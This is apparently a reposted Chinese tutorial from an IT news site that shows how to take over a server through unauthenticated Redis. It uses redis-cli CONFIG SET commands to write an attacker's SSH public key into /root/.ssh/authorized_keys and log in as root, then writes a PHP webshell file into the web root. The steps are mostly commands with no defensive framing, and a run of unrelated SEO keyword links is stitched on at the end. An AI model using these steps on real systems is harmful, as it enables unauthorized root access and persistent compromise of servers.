Redis未授权访问导致服务器被控制
发表于:2024-11-23 作者:千家信息网编辑
千家信息网最后更新 2024年11月23日,通过使用nmap扫描,发现某一端口对应的服务为Redis,然后我们可以尝试看看是否是未授权访问!首先使用下列命令安装Redis tools:root@kali:~# apt-get install r
千家信息网最后更新 2024年11月23日Redis未授权访问导致服务器被控制
通过使用nmap扫描,发现某一端口对应的服务为Redis,然后我们可以尝试看看是否是未授权访问!
首先使用下列命令安装Redis tools:
root@kali:~# apt-get install redis-tools
然后通过下列命令看是否是未授权访问:
root@kali:~# redis-cli -h 10.198.131.110.198.131.1:6379>
然后我们可以使用免密登录的方式进行相关***:
生成公钥:
root@lsy:~/.ssh# ssh-keygen -t rsaroot@lsy:~/.ssh# cat id_rsa.pub ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3lO+OSwj2zQuGON15ATfVwJAtLLbiswFoV/uqFHrw0BxaWSHTWgtrlzXyDen/ktDDBjfERlDys0vcZ3NQZ0/W+fWzbQkZbj/ABFsthhdQpdWWRz6wwOxY2tAKYhiZTcLchdFTnrU3+fkwD+im2W966A5UEZZmzTzTi/qA9BZwZghRrEx8Mr5+jVhQ8mYbR0QooggxTlafsavsBAG/aBTShoEanOuL4Pdx5aevmT3ydhwEJFwQQjBkARc8AUFY8cyS0/iPzT010uZYYHCPzhzm25QUSSbvIz9m7Mjwno72/OhKMCmVURkY4S1O4yXFzk+TlQ8P5jm+/pomKd++aPSn root@lsyroot@lsy:~/.ssh#
将公钥写入远程服务器:
root@lsy:~/.ssh# redis-cli -h 10.198.131.110.198.131.1:6379> CONFIG SET dir /root/.ssh/OK10.198.131.1:6379> CONFIG SET dbfilename authorized_keysOK10.198.131.1:6379> set xxxx "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3lO+OSwj2zQuGON15ATfVwJAtLLbiswFoV/uqFHrw0BxaWSHTWgtrlzXyDen/ktDDBjfERlDys0vcZ3NQZ0/W+fWzbQkZbj/ABFsthhdQpdWWRz6wwOxY2tAKYhiZTcLchdFTnrU3+fkwD+im2W966A5UEZZmzTzTi/qA9BZwZghRrEx8Mr5+jVhQ8mYbR0QooggxTlafsavsBAG/aBTShoEanOuL4Pdx5aevmT3ydhwEJFwQQjBkARc8AUFY8cyS0/iPzT010uZYYHCPzhzm25QUSSbvIz9m7Mjwno72/OhKMCmVURkY4S1O4yXFzk+TlQ8P5jm+/pomKd++aPSn root@lsy\n\n\n"OK10.198.131.1:6379> saveOK10.198.131.1:6379> exit
使用ssh远程登录:
root@lsy:~/.ssh# ssh 10.198.131.1
免密登录成功:
上传webshell
#redis-cli -h 192.168.2.5 -p 6379192.168.2.5:6379>config set dir /var/wwww/html192.168.2.5:6379>config set dbfilename 1.php192.168.2.5:6379>set webshell ""192.168.2.5:6379>save
登录
服务
公钥
命令
服务器
成功
方式
端口
尝试
生成
控制
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
贵州有苹果数据库吗
汶上服务器怎么样
网络安全主题演讲
连云港住宿软件开发
圣安地列斯服务器
网游最大的成本就是服务器
教育局网络安全知识
海康服务器管理口用户名密码
网络技术广告标语
乐视有线电视静态连接服务器端口
怎么做垃圾分类软件开发
数据库表里面的数据
手机搞软件开发用什么软件
航天软件开发人员的职责
tp6离线服务器部署文档
万方数据库充值可以退款吗
网络安全类杂志
核酸检测结果数据库建设
工信部 网络安全证书
管理系统 服务器托管合同
玫瑰科技互联网
爱科网络技术支持
中兴eda软件开发
数据库管理系统及其发展历史
cms数据库文件
移动互联网络科技
c 数据库两列相加
数据库插入语句commit
深圳富利邦互联网科技有限公司
erp云服务器配置